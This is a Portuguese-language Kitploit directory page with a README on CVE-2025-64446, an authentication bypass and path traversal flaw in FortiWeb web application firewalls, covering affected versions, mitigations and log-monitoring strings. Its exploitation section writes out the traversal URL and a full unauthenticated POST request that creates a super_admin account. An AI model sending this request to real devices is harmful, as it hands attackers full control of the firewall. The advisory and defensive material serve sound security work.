Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/0xblackash/cve-2025-64446
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHub0xblackash/cve-2025-64446

CVE-2025-64446

CVE-2025-64446

Ver Repositório
4há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🛡️ CVE-2025-64446 - Bypass Crítico de Autenticação e Path Traversal no FortiWeb

Linux 6 15 Released (18) (1)

Severity Fortinet Exploited

Vulnerabilidade crítica sem autenticação que permite a atacantes remotos criar contas de administrador em dispositivos FortiWeb.


📌 Visão Geral

CVE-2025-64446 é uma grave vulnerabilidade de relative path traversal na interface de gerenciamento do FortiWeb Web Application Firewall.

Um atacante remoto não autenticado pode explorar esta falha para bypassar a autenticação e criar novos usuários administradores com privilégios totais, levando ao comprometimento completo do dispositivo.

  • Pontuação CVSS v3.1: 9.8 (Crítico)
  • Tipo de Ataque: Remoto não autenticado
  • Impacto: Assunção administrativa total
  • Status: Explorado ativamente na natureza

🛠️ Versões Afetadas

ProdutoVersões AfetadasCorrigido na Versão
FortiWeb 8.08.0.0 – 8.0.18.0.2 e superiores
FortiWeb 7.67.6.0 – 7.6.47.6.5 e superiores
FortiWeb 7.47.4.0 – 7.4.97.4.10 e superiores
FortiWeb 7.27.2.0 – 7.2.117.2.12 e superiores
FortiWeb 7.07.0.0 – 7.0.117.0.12 e superiores

Recomendação: Atualize para a versão corrigida mais recente o mais rápido possível.


🔥 Como os Atacantes Exploram Esta Vulnerabilidade

Exploração Passo a Passo

  1. Identificação do Alvo
    O atacante procura por interfaces de gerenciamento do FortiWeb expostas publicamente (geralmente na porta HTTPS 443 ou 8443).

  2. Construção da Requisição Maliciosa
    O núcleo do exploit é um relative path traversal (../) combinado com uma URL especialmente criada que alcança um endpoint CGI interno não autenticado.

    Vulnerable Endpoint Pattern:

    root@kitploit:~
    /api/v2.0/cmdb/system/admin?.../../../../../../cgi-bin/fwbcgi
    
  3. Envio do Exploit

    O atacante envia uma única requisição POST com payload JSON para criar uma nova conta de administrador.

    Example Exploit Request:

    root@kitploit:~
    POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
    Host: target-fortiw eb.example.com
    Content-Type: application/json
    
    {
      "name": "hackedadmin",
      "password": "AttackerPass123!",
      "access_profile": "super_admin",
      "type": "local"
    }
    
  4. Exploração Bem-sucedida

    Se bem-sucedido, o FortiWeb cria a nova conta de administrador sem exigir qualquer autenticação prévia. O atacante pode então fazer login com as credenciais recém-criadas e obter controle total do WAF.

Por que Funciona

A API de gerenciamento falha em sanitizar adequadamente o caminho, permitindo que a requisição percorra de volta ao binário legado fwbcgi, que não impõe autenticação em certas operações.


📸 Screenshots

Fortinet0day 3 Fortinet0day Fortinet0day 1 Fortinet0day 2

🛡️ Mitigação e Melhores Práticas

  • Atualize imediatamente o FortiWeb para uma versão corrigida
  • Nunca exponha a interface de gerenciamento diretamente à internet
  • Use forte segmentação de rede e VPN para acesso administrativo
  • Monitore logs em busca de requisições contendo fwbcgi, ../, ou tentativas incomuns de criação de admin
  • Audite regularmente as contas de administrador em busca de entradas suspeitas

Apenas para fins educacionais e de pesquisa de segurança defensiva.

Feito com ❤️ para a comunidade de cibersegurança

Última atualização: Abril de 2026

Baixar ferramenta